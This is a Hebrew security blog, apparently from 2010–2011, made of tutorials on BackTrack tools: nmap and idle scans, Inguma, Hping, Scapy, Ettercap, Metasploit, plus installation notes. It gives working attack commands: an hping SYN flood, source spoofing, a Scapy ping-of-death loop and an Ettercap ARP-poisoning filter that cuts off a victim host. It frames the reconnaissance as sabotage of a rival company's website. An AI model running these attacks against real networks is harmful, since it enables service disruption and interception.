‏הצגת רשומות עם תוויות backtrack. הצג את כל הרשומות
‏הצגת רשומות עם תוויות backtrack. הצג את כל הרשומות

יום שבת, 22 בינואר 2011

Information Gathering

לפני כל מבצע מתבצע איסוף מידע על היעד, כמו שזה במציאות כך זה גם בעולם הוירטואלי, איסוף המידע לפני התקפה הוא שלב קריטי עבור התוקף, בלעדיו לא ניתן לצאת להתקפה.

איסוף האינפורמציה מתבצע בהמון טכניקות במטרה לקדם את ההתקפה, נניח שיש 2 חברות (אחת נקרא ל A ולשניה B) והן מיצרות את אותו מוצר וכל אחת תופסת חצי מהשוק, הפלטפורמה השיווקית שלהם היא האינטרנט, ובעל הבית של חברת A התחרפן על דעתו והחליט שהוא רוצה לתפוס 80 אחוז מהשוק, הוא ניסה בדרכים ישרות וכשראה שזה בלתי אפשרי הוא הלך לצד האפל ברשת והפעיל קבוצה של אנשים מסתוריים שיעשו בשבילו את העבודה.

נניח שאנחנו היא החברה האפלה והמיסתורית, כיצד נשלים את המשימה הזדונית?
אנחנו יודעים את המטרה, אנחנו יודעים את הפלתפורמה ועכשיו נתחיל באיסוף המידע.

מי האויב שלנו?
השלב הראשון באיסוף המידע הוא להבין את מי אנחנו הולכים לתקוף, נעשה עליו חיפושים לגיטימיים ברחבי הרשת
  1.  נשאל את Google (הכי פשוט והכי מהיר).
  2.  נבדוק באתרים פיננסיים (גודל החברה, מיקומים, מנכ"לים, כספים).
  3. רשתות חברתיות (שמות של עובדים, חברים של העובדים, בלוגים).

איזה מערכות יש לו?
אנחנו יודעים שהקורבן משתמש בפלטפורמה של אינטרנט ודרך הפעולה להשלמת המשימה היא לפגוע באתר והלקוחות שלו על מנת שיעברו לחברה ששכרה אותנו למשימה, אנחנו יודעים שבכל העסק יושב איזה שרת אינטרנט שמפעיל את האתר.

על מנת שנוכל למקד את נקודת הפריצה שדרכה נפגע באתר נבדוק את דרכי התקשורת עם הקורבן, ננסה להבין את גודל התשתית ואת ערוצי התקשורת שלו, נחפש את החשיפות המתאימות להתקפה ולהעלמת העקבות.

יש עשרות כלים לזיהוי חשיפות שמאפשרות לתוקף למצוא לו את ההתקפה המתאימה.


Nmap
אחד הכלים הותיקים והמפורסמים בתחום מכיל בתוכו המון אפשריות, ובעצם הכלי סריקה האמין ביותר שקיים,ניתן לזהות את מערכות ההפעלה, הפורטים ואת ה Services שרצים על השרת, והוא ניתן להורדה מהאתר: http://nmap.org/ , יש לו גרסאות  Gui ו Console ומגיע עם Backtrack , הוא מפורסם גם בתעשיית הסרטים וניתן לראות בסרטים כמו :
Matrix Reloaded, Bourne Ultimatum, Die Hard 4.

דוגמה לסריקה
#: nmap -A 192.168.1.1


ניתן לראות Ports פתוחים, מערכות ההפעלה, שמות  ברשת וכו'.
סריקה כזאת חושפת את התוקף כי היא משאירה חותמת מאוד ברורה במערכות הניתור של הקורבן.



ניתן לראות את הזמנים המאוד קצרים בין חבילה לחבילה שנשלחת מהתוקף.
ניתן לבצע סריקות יותר איטיות שלוקחות יותר זמן אבל מוסתרות יותר, האות T מייצגת את הזמן של הסריקה, כש 1 היא האיטית ביותר עד 5 שהיא המהירה ביותר.

#: nmap -T1 -A 192.168.1.103



ניתן לראות את שהזמנים יותר ארוכים בין חבילה לחבילה.


Zombie
שימוש במחשב "Zombie" שיבצע בשבילנו את הסריקה מבלי לחשוף את עצמנו, איך בדיוק זה עובד?
בתוך המושג Zombie מסתתרת בעייה עמוקה והיא ברמת ההתנהגות הבסיסית של הפרוטוקול Tcp/Ip , כל חבילה שנשלחת מכילה מספר רץ, בכל חבילה יש מספר שעולה + 1 כאשר מגיעה חבילה חדשה, ובעצם ע"פ הקפיצות ניתן לחזות אם ה Port פתוח או לא.

#: nmap -sI Zombie-Address -PN -v Victim-Address


הפעולה שמאחורי הקלעים:

שליחת Packet SYN/ACK ל Zombie


  • החבליה שחוזרת לנו מהזומבי היא RST ובעצם מעלה את ה ID באחד.


שליחת חבלית  Spoof  Packet SYN.

  • נשלחת דרכנו חבילה מטעם הזומבי.


הקןרבן מחזיר Packet SYN/ACK


  • מעלה את ה ID בזומבי ב 1.

שליחת Packet SYN/ACK נוסף ל Zombie



החבילה שחוזרת לנו חוזרת + 1 , כלומר אם ננתח את השיטה בחבילה הראשונה שנשלחה המספר ID עלה ב 1 כאשר אנחנו שולחים את החבילת ה Spoof שלנו ה Victim שולח חבילת SYN/ACK בעקבות הבקשה של SYN ששלחנו בחבילה, הזומבי מסרב לחבילה ומחזיר חבילת RST ומעלה את ה ID שלו ב 1  פעם נוספת כששולחים חבילה נוספת של SYN/ACK לזומבי מקבלים חבילה RST שמעלה את ה ID באחד ובעצם אם ה ID קפץ 3 פעמים ,המסקנה שה Port אצל ה Victim פתוח במקרה וחבילה החוזרת מה Zombie וה ID קפץ רק פעמיים זה אומר שה Port כנראה סגור כי חבילת ה Spoof לא הגיעה ליעד שלה.

ניתן לראות איך זה קורה בפועל מאחורי הקלעים:
#: nmap -sI Zombie-Address -PN -r --packet-trace -v Victim-Address 


 Httprint
כלי לזיהוי האפליקציה שמריצה את האתר, הכלי מאוד פשוט והוא עובד על ניתוח של החבילות שחוזרות, מגיע עם Backtrack, להורדה: http://net-square.com/httprint/


במקרה שלנו אנחנו רוצים לדעת אם המערכת עובדת על IIS או Apache , ה Response שנקבל שונים מאפליקציה לאפליקציה ובנוסף נקבל את הגרסה הנוכחית על מנת שנוכל להתאים לה התקפה.


כיצד ניתן לבלבל את התוקפים?

FireWall
נחשוף לעולם כמה שפחות, הגדרות נכונות ב Firewall והסרה של שירותים שלא נחוצים למערכת שלנו.
Packet TTL
לשנות את זמני ה TTL שהמערכת מחזירה, כלומר ה Hops שיכולים לעבור ב Datagram שבחבילה, ובכל Hop  שאנחנו עוברים בדרך ה TTL קטן באחד, ברגע שאנו עוברים יותר Hops מהכמות המוגדרת ב TTL נקבל הודעת ICMP Time Exceeded, ב Windows הגדירו את ב TTL כ 128 וב Linux כ 64.

שינוי TTL ב Windows Server 2008
נפתח את ה RegEdit ונלך למפתח:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters


נוסיף Dword 32 bit נגדיר את ה TTL הרצוי, בין 1 - 255, חשוב לא להגדיר מספר נמוך מידי, נשמור אותו כ DefaultTTL



Http Response
שינוי ה Response שחוזרים לנו ב Http , לדוגמה אם נגיע לדף שלא קיים נקבל הודעת שגיאה יחודית עבור האפליקציה שמריצה את האתר.


הדף שחזר לנו מראה לנו הודעת שגיאה של IIS7 שמצביעה על מערכת הפעלה מסוג Windows, ניתן לשנות את הדפים ובכך לבלבל את הסריקות של התוקף.



קבצי השגיאות מסוג Html והם ממוקמים בספרייה:
C:\inetpub\custerr\en-US\
ניתן לשנות את הניתוב עבור דפי השגיאות ברמת ה IIS ב Error Pages.


לסיכום:
איסוף המידע הוא קריטי עבור שלב ההתקפה, ובעצם כל חשיפה שיש על הקורבן מקרבת את התוקף לפריצה שהוא רוצה להפעיל - Exploits, DOS attack , Brute Force וכדומה.


יום שני, 27 בדצמבר 2010

Inguma - Starting Guide

כלי Penetration Test נוסף שקיים ב Backtrack ,הוא נכתב ע"י Joxean Koret בשנת 2006 ומאז יצאו מספר גרסאות, גם הוא מבוסס על  שפת Python בדומה ל Scapy, מאפשר מגוון רחב של אפשריות החל מסריקת פורטים עד הפעלת Exploits ו Fuzzers.


 יש לכלי הזה הרבה אפשריות נחמדות שניתן להשיג גם בכלים אחרים אבל עדיין הוא מומלץ לשימוש לפי דעתי בגלל הפשטות והיעילות שלו, הוא מכסה התקפות רבות, ובשנת 2007 נבחר מקום שני כתוכנת האבטחה הטובה ביותר ע"י security-database.com.

התוכנה מאוד מזכירה את Scapy בצורת העבודה, ובעצם עובדים עם אובייקטים ופקודות כחלק מ Python וגם פה יש לנו אובייקט שאותו צריך להגדיר בשונה מ Scapy שעשתה לנו חבילות מידע "מלוכלכות" פה האובייקט לא מדבר על ה Packet עצמו אלא יותר בכיוון המכונה שאנו מעוניינים לתקוף ובעצם הפרמטרים הרבה יותר פשוטים להעמסה ולא צריך להיות גאון Tcp/ip  על מנת להפעיל אותה.

הכלי נוגע במספר עולמות:

  • חשיפות של שירותים על הקורבן.
  • איסוף אינפורמציה על הקורבן.
  • התקפות Brute Force על הקורבן.
  • הפעלות Fuzzer על תוכנות שרצות על הקורבן.
  • הפעלת Exploits על הקורבן.
inguma> show options
מציגה לנו את האובייקט של המטרה שלנו



העמסת המטרה:
inguma> target = '192.168.1.105'

בחירת Port:
inguma> port = 80


פונקציות:

inguma> identify
יחזיר לנו את ה Service שעובד על הפורט.

inguma> tcpscan
יחזיר לנו את הפורטים שפתוחים לנו במכונה בפרוטוקול Tcp

inguma> isnated
אם הפורט מאחורי NAT

inguma> whois
חיפוש של ה Hostname בשרתי Dns.

inguma> arping
קבלת MAC address של המטרה.

inguma> fakearp
זיוף Arp

inguma> nikto
חיפוש קבצים לא מאובטחים על ה Web server

inguma> arppoison
Arp Poisoning

קיימים בתוכו עוד מספר כלים נוספים כמו: Sniffer, Smbclient ולהם אפשריות נפרדות.
inguma> sniffer
SNIFFER> help
SNIFFER> run




יש 2 תוספות נוספות ,הן מופעלות בנפרד ומשתמשות בסקריפטים של Inguma:

OpenCid - כלי לחיפוש חולשות אבטחה בקבצים בינארים.
Krash - זה הוא ה Fuzzer שמגיע עם Inguma שעליו אני אפרט איך לתקוף Web server.

שלב ראשון - הכנות:
לכידת Packet של ה Get  שעוברת מהתוקף לנתקף, ניתן לבצע את הלכידה בעזרת WireShark.



ה Packet שלנו יראה משהו כזה



נשמור את הקובץ לדוגמה: http_packet.http בספריה
#: /pentest/exploits/inguma/krash/audits/http_packet.http

שלב שני - הפעלת ה Fuzzer:
#: /pentest/exploits/inguma/krash/ ./krash.py audits/http_packet.http 192.168.1.105 0

שלב שלישי - בדיקות:
ה Fuzzer יערבל לנו את ה Packet ויוסיף לתוכו תוספות שבעזרתם ינסה להפיל את השירות של ה Web Server על מנת לראות אם זה עובד נחזור בחזרה ל WireShark ונראה אם תוכן ה Packet המקורי שאספנו בהתחלה השתנה.



לאתר Inguma

בהצלחה... 

יום שלישי, 14 בדצמבר 2010

Hping - Starting Guide

פלטפורה שמזכירה מאוד את Scapy , רק שפה לא מדובר בכתיבת קוד ב Python אלא בתוכנה של ממש המקבלת Arguments , התכונה העיקרית כמו אצל Scapy והיא יצור של חבילות מידע "מלוכלכות" על מנת לבדוק מערכות: FireWall, IPS,IDS ועוד.
מגוון האפשריות בה מצומצם אך עדיין יעיל מאוד, מאפשרת שימוש בפרוטוקולים: TCP,ICMP,IP,UDP ועבודה עם קבצים ,צורת העבודה ידידותית מאשר מ Scapy מה שהופך אותה לכלי פופולרי מאוד בקרב האקרים.
המאמר נכתב על BackTrack 4.

תחילה נפתח חלון Console ונרשום:
#: haping -help
נראה את כל הפרמטרים להעמסה בתוכנה.

Syn-Flood Attack
#: hping -i u1 -S -p 80 192.168.1.105

שליחה מאוד מהירה של חבילות מידע עם דגל Syn , שבפועל יוצר עומס על הקורבן עד שמבאים ל Denial Of Service, בעקבות עומס על המעבד, אחרי שהבנו מה שלחנו נפרק את המשפט לחלקים:

-i u1 - Interval
מספר חבילות פרק זמן למשל u10000 זה 10 חבילות בשניה.

-S - Syn Flag
פרמטר זה קובע שהחבילה שלנו היא Syn אבל ניתן לבחור חבילות נוספות Syn,Rst,Fin,Push,Ack,Urg,Xmas.

-p - Dest Port
הפורט של הקורבן.

Port Scan
#: hping 192.168.1.105 -V --scan 100-110

סריקת פורטים של הקורבן בין פורט 100 ל 110


Spoof
#: hping 192.168.1.105 --udp --spoof 192.168.1.150

שליחת חבילות מידע מכתובת מזויפת.


2Flags Packet
#: hping 192.168.1.105 -S -A -V -p 443

שליחה חבילה עם דגל נוסף
סרטון הדגמה:

בהצלחה...

יום שני, 13 בדצמבר 2010

Scapy - Starting Guide

אחד הכלים המומלצים ליצירת Packets "מלוכלכים", חבילות מידע העוברות ברשת ויכולות ליצור תקלות מכוונות על מנת לבצע מגוון רחב של התקפות כמו: Denial Of Service, Exploits,Arp Poisoning ועוד.
היא מבוססת על שפת Python, ניתנת לשינוי ע"י המשתמש, כמובן כל הפרויקט הוא Open Source ובעצם היא ערכת סקריפטים ענקית וניתן להריץ בה Exploits  בכמה שורות מאשר לכתוב את ה Exploit ב C, עושים בה המון בדיקות חדירות ובדיקות למערכות IPS / IDS כמו SNORT.

מאמר זה נעשה על Backtrack 4:


המערכת פותחת לנו Command Line של Python ועכשיו נשתמש לנו באובייקטים של Scapy.

פקודת conf:
מראה לנו את הפרמטרים הגלובלים לתוכנה וניתנים לשינוי ע"י המשתמש.
>>> conf
>>> conf.session = '1'
עכשיו בעצם שינינו את ה Session לערך 1.

פקודת ()ls:
מציגה את רשימת ה Packets השמורים ב Scapy שאותם המשתמש יכול לשנות ע"פ רצונו.

בניית אובייקט IP:
הצהרה על האובייקט
>>> ip = IP(dst="192.168.1.105")
הגדרנו אובייקט של IP שמצביע על כל הכתובת שאותה אנחנו רוצים לתקוף.
>>>ip.show()
מציג לנו את הפרמטרים שניתנים לשינוי בתוך האובייקט.


במקרה שנרצה לעשות Spoof נשנה את ה src לאיזה כתובת שנרצה להתחזות לה.
>>> ip.src = "77.120.20.12"

יצירת אובייקט Protocol:
הצהרה על הפרוטוקול
>>> p = TCP()
יצרנו אובייקט מסוג פרוטוקול של TCP, אבל ניתן להגדיר סוגים רבים של פרטוקלים כמו ICMP,UDP,PPP ועוד.

הצגת הפרמטרים של הפרוטוקול
>>> p.show()

ניתן לשנות את הפרמטרים של הפרוטוקול באובייקט
>>> p.flags ="FS"

הצהרנו על הדגלים של Fin ו Syn שבעצם צירופם ביחד הוא לא הגיוני מבחינת מבנה הפרוטוקול, Fin מגדיר סיום תקשורת עם השולח וSyn מנסה לפתוח חיבור עם השולח ולכן הם מנוגדים או שילוב של Fin ו Rst שבצם סוגר את החיבור ומנסה לעשות Reset לחיבור שכבר סגור, ניתן לבדוק בעזרת שילובים אלה כיצד מערכת ההפעלה או ה Firewall מגיבים.

שליחת ה Packet:
>>> send(ip/p)
ניתן לשלוח את ה Packet מספר פעמים
>>> send([ip/p] * 300)
שלחנו את החבילה 300 פעמים.



התקפות נוספות לדוגמה:
Port Scan:
res,unasns = sr(IP(dst="192.168.1.1") /TCP(flags="S",dport(1,1024)))

Ping Of Death:
for p in fragment(IP(dst="192.168.1.1")/ICMP()/("X"*60000)):send(p)

Request MAC Address:
res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /ARP(pdst="192.168.1.0/24"))
 
*ניתן לקבל תוצאות לתוך משתנה לדוגמה res שלמעלה , על מנת להציג את התוצאות נרשום
res.show()
 
לאתר Scapy:
 
בהצלחה...

יום שבת, 11 בדצמבר 2010

Ettercap - Denial Of Service Attack

Ettercap היא חבילת כלים של Man In The Middle Attack עבור רשתות , ניתן לבצע Sniffing ו Filtering לחיבורים קיימים בעזרת Arp Poisoning ,החבילה הזאת נמצאת בשוק כבר משנת 2001 , ובהחלט יצרה באז רציני בנושא, היא באה כחלק מ BackTack אבל ניתן להוריד אותה לכל מערכת Linux וגם לה יש ממשקים שונים: Ettercap שבסגנון ה Console ו Ettercap-GTK שהוא ה Gui ומאוד נוח.

במאמר זה אני יסביר כיצד ניתן לבצע התקפת Denial Of Service על מחשב שנמצא איתנו ברשת, תחילה יש לכתוב לנו סקריפט שיבצע את הפעולה, הסקריפט שלנו הולך להפיל כל Packet שהיעד שלה הוא הקורבן שלנו:

If(ip.src == '192.168.1.105' || ip.dst == '192.168.1.105')
{
  drop();
  kill();
}
מה שאומרת הפיסת קוד הזאת היא לא משנה אם ה Packet מיועד למכונה 192.168.1.105 או שהמכונה מנסה להוציא Packet החוצה תפיל אותה, נשמור לנו את הקוד כ dos.eft

*למשתמשי BackTrack ניתן לרשום את הקוד בעזרת Kate או בכול עורך טקסט אחר, יש לשמור את הקוד בספריה של Ettercap , אבל גם זה לא חובה.
/usr/share/ettercap

לאחר ששמרנו את הקובץ אנחנו צריכים לעשות לו Compile אחד הכלים שמגיעים עם Ettercap הוא ה EttercapFilter זה כלי שיהפוך את הקוד שרשמנו לסקריפט פעיל.

יש להריץ את הפקודה בתוך הספרייה של Ettercap

root@bt:/usr/share/ettercap# etterfilter dos.eft -o dos.ef



עכשיו לאחר שסיימנו להכין לנו את הקוד של ההתקפה נפעיל את Ettercap.

תחילה נגדיר לנו את הכרטיס שעליו אנחנו רוצים לעבוד Sniff - > Unified Sniffing.


לאחר מכן נעשה סריקה למחשבים שעל הרשת  Host -> Scan for hosts




נוסיף את התחנה שאנו מעוניינים לתקוף ל Target שלנו Target -> Current Targets
נוסיף אותה לקבוצה Target 1




עכשיו על מנת שכל העסק יעבוד צריכים להפעיל את  Arp Poisoning על מנת שכל התקשורת שיוצאת מהמחשב המותקף תעבור קודם דרכנו ורק אח"כ תצא לעולם.
Mitm -> Arp Poisoning
להשאיר את ה CheckBox ריקים.



מה שנשאר לנו לעשות זה להריץ את הסקריפט שלנו Filters -> Load Filter


נבחר לנו את הקובץ ש EttercapFilter יצר לנו dos.ef ובעצם התחלנו את ההתקפה.



לעוד פרטים על Ettercap ניתן להיכנס לאתר הפרויקט:
בהצלחה...

יום שבת, 27 בנובמבר 2010

Metasploit Framework



אחד הכלים החזקים שקיימים ל Penetration Test , בעצם איחוד של המון סוגי פריצות בשפות שונות ל Framework מרכזי, ניתן לבצע מגוון סוגים של פריצות עבור מערכות הפעלה שונות.

במאמר זה נעשה סקירה מהירה כיצד בדיוק עובדים עם המערכת ואת התוצאה הסופית של הפריצה.

ה Framework מגיעה מובנה עם גרסאות של המערכת BackTrack אך ניתן להוריד אותו למערכות לינוקס אחרות וכמובן גרסת Windows, המערכת מגוונת בממשקים שלה ניתן לעבוד איתה ב 3 ממשקים שונים - Console,Web,Gui
לאתר Metasploit

הקורבן שלנו הוא Windows Server 2003 SP2.

תחילה יש לבחור את ה Exploit שאיתו נבצע את הפריצה אחד הנפוצים לשימוש במערכות Windows הוא: MS08_067_NETAPI שמבוסס על הפרוטוקול SMB - server message block.

לאחר מכן נגדיר את הפרמטרים RHOST למכונה שאותה אנו מעונינים לפרוץ במקרה שלנו ל Windows server 2003 שבכתובת 192.168.1.108.

נשאר לנו לבחור מה בדיוק אנחנו רוצים שהפריצה תעשה (PAYLOAD) - לפתוח לנו Command Line מרוחק , לפתוח לנו חיבור מרוחק ב VNC והמון אפשריות אחרות.

לסיום נריץ את ה Exploit.

יום שישי, 26 בנובמבר 2010

BackTrack 4 Network VirtualBox


התקנתי BackTrack 4 ע"ג מכונה שהגדרתי על ה VirualBox , מסתבר שבניגוד לגרסה 3 מגיעה ערכת התקנה נוחה, לאחר שהתקנתי ה BackTrack אפשריות הרשת שלה מכובות ולא הצלחתי לקבל כתובת מ DHCP.

דבר ראשון בדקתי את ההגדרות ב VirtualBox.


נגדיר את הכרטיס רשת כ Bridged Adapter על מנת שנוכל לקבל כתובת מה DHCP.

נריץ את הפקודה הבאה:

#: /etc/init.d/networking start


המערכת תחפש כרטיסי רשת חדשים שירשמו לקובץ Interface נציג את קובץ:
#: cat /etc/network/interfaces


ניתן לערוך את קובץ ה Interfaces לצורך הגדרת כתובת Static:
 
auto eth0
iface eth0 inet static
address 192.168.1.100
netmask 255.255.255.0
network 192.168.1.1
broadcast 192.168.1.255
gateway 192.168.1.1

או למחוק כרטיסי רשת שלא רלוונטים.


ניתן לבצע את הפקדות האלו ישירות ב BOOT ע"י הפקודה הבאה:
#: update-rc.d networking defaults
בהצלחה...

יום שבת, 23 באוקטובר 2010

Installing BackTrack 3 on HardDrive


התקנת Backtrack ע"ג כונן קשיח הוא תהליך מסורבל, יש מספר שלבים על מנת להשלים את התהליך:

שלב א: הכנת הכונן הקשיח

נכניס את הדיסק ההרצה שמריץ את המערכת ההפעלה מהדיסק , ניתן להוריד את הדיסק מהאתר של Backtrack,המאמר מתייחס ל Backtrack 3 בלבד ולא על גרסאות חדשות יותר.

יצירת 2 מחיצות Partitions , הראשון עבור הקבצים שלנו בכונן הקשיח והשני עובר הזיכרון Swap.
על מנת ליצור Partitions יש להשתמש ב fdisk עם מיקום של הכונן הפיזי, אצלי זה HDA , זה תלוי מי היצרן של הכונן הקשיח.

#: fdisk /dev/hda


הפקודה M מאפשרת להראות לנו את רשימה הפקודות עבור Fdisk.

הפקודה N מאפשרת יצירה של Partition חדש, תחילה יש לבחור את סוג הפעולה.

Command (m for help): n
Command action
e extended
p primary partition (1-4)







נבחר לנו את ה P  כ primary ,נגדיר את ה Partition ל 1, ונגדיר לו את הנפח ב MB, במקרה שלי היה כונן בנפח 40 GB שמתוכו הגדרתי 30 GB שזה 30000M.

על מנת לראות את הגדרות נלחץ על p:

עם 10 GB הנוספים שיש לנו נגדיר את ה Swap, הנקודה שאליה נרשם הזכרון לכונן הקשיח באותו תהליך , נריץ את הפקודה N על מנת ליצור Partition  חדש, נסמן גם אותו כ P , נגדיר אותו כ Partition  מספר 2.
בניגוד ל Partition הראשון ה Partition  הזה צריך להיות מוגד כ SWAPוזאת נעשה בעזרת הפקודה t נבחר את ה Partition  שהגדרנו כ Swap במקרה שלנו מספר 2, ונגדיר אותו כ hex code:82 שזה ה Type של linux swap

לסיום נריץ את ה פקודה W על מנת לאפשר כתיבה על ה Partition.
 
נפארמט את הכונן המרכזי שמספרו הוא 1, הוא נוסף לשם הלוגי של הכונן במקרה שלי HDA1
 
#:mkfs.ext3 /dev/hda1
 
נגדיר את מיקום ה Swapשהגדרנו:
 
#:mkswap /dev/hda2
 
נפעיל אותו:
 
#:swapon /dev/hda2
 
סיימנו את השלב הראשון.
 
שלב שני: יצירת ספריות להעתקה
ניצור את הספריות הבאות:
 
#:mkdir /mnt/backtrack
נעשה mount לכונן לספריה החדשה
#:mount /dev/hda1 /mnt/backtrack/
ניצור את ספריית ה BOOT
#:mkdir /mnt/backtrack/boot
נעתיק את הספריות מהדיסק כולל תת ספריות
#:cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/
התהליך לוקח קצת זמן לאח"כ ניצור קבוצת תקיות חדשות:
#:mkdir /mnt/backtrack/{mnt,proc,sys,tmp}
נריץ 2 פקודות Mount על מנת להגדיר את הספריות המערכת:
#:mount --bind /dev/ mnt/backtrack/dev/
#:mount -t  proc proc /mnt/backtrack/proc/
נעתיק את ה Boot לספרית ה Boot שיצרנו לפני:
#:cp boot/vmlinuz /mnt/backtrack/boot
נשנה את ה ROOT:
#:chroot /mnt/backtrack/ /bin/bash
 
שלב שלישי: עריכת קובץ תוכנת ה  Boot
 
נערוך את קובץ Lilo.conf של התוכנה Lilo שמריצה את ה Boot.
#:nano /etc/lilo.conf
 
ניתן להוריד את השורות שמסומנות כהערה, חשוב מאוד להשים לב לפרמטרים הבאים:
ה boot צריך להצביע על הכונן פיזי במקרה של Hda
boot = /dev/hda
 ה Root צריך להצביע ל Partition הראשון שהגדרנו
root =/dev/hda1
ונשנה את ה Label ל backtrack
label = backtrack
 
נשמור את הקובץ ועל מנת שההגדרות יכנסו לתוקף נרשום:
#:lilo -v
 
נפעיל את המחשב מחדש, נוציא את הדיסק מהכונן ויעלה לנו מסך אדום של ה boot עם בחירת מערכת ההפעלה.
 
בהצלחה.